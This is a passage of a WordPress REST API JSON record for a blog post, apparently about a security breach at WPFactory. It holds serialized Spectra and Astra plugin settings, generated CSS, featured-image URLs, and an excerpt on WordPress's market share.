s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778448080\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/ro\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ro\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}